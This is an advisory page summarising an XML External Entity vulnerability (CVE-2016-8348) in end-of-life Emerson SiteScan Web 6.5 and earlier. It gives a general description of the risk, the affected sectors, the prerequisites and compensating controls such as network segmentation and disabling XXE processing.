Emerson Liebert SiteScan XML External Entity Vulnerability

Monitor7.5ICS-CERT ICSA-16-334-01Sep 2, 2016

Attack VectorNetwork

Auth RequiredNone

ComplexityLow

User InteractionNone needed

Summary

Emerson SiteScan Web versions 6.5 and earlier contain an XML External Entity (XXE) injection vulnerability in XML parsing functionality. An attacker can send a malicious XML request to extract sensitive files from the affected system, potentially exposing system configuration, credentials, or other confidential data. The affected application is end-of-life and the vendor has not planned security updates.

What this means

What could happen

An attacker with network access to SiteScan Web could read sensitive files from the server, such as configuration data or credentials, by exploiting an XML parsing vulnerability. This could expose information needed to compromise facility monitoring and control systems.

Who's at risk

Water utilities, electric utilities, and other industrial facilities using Emerson SiteScan Web for facility monitoring and HVAC system management. This includes any organization relying on SiteScan Web for remote access to facility automation systems.

How it could be exploited

An attacker sends a specially crafted XML request to SiteScan Web that includes external entity references. The web application parses the XML without proper validation, allowing the attacker to retrieve arbitrary files from the server filesystem.

Prerequisites

Network access to SiteScan Web application port
SiteScan Web version 6.5 or earlier

remotely exploitableno authentication requiredlow complexityno patch availableinformation disclosure risk

Exploitability

Low exploit probability (EPSS 0.4%)

Affected products (1)

ProductAffected VersionsFix Status

SiteScan Web: <=6.5≤ 6.5No fix (EOL)

Remediation & Mitigation

0/4

Do now

0/2

HARDENINGIsolate SiteScan Web from untrusted networks using network segmentation or firewall rules allowing only necessary administrative access

WORKAROUNDDisable or restrict XML external entity (XXE) processing if the application allows configuration of XML parser settings

Schedule — requires maintenance window

0/1

Patching may require device reboot — plan for process interruption

HARDENINGImplement network-based intrusion detection rules to alert on XXE attack patterns sent to SiteScan Web

Mitigations - no patch available

0/1

SiteScan Web: <=6.5 has reached End of Life. The vendor will not release a patch. Apply the following compensating controls:

HARDENINGPlan replacement or upgrade of SiteScan Web as vendor has not planned fixes for this end-of-life product

CVEs (1)

CVE-2016-8348

View full CISA ICS-CERT advisory

↑↓ Navigate · Esc Close

API: /api/v1/advisories/9082ad0b-ebf6-490c-a8c7-94326d743e08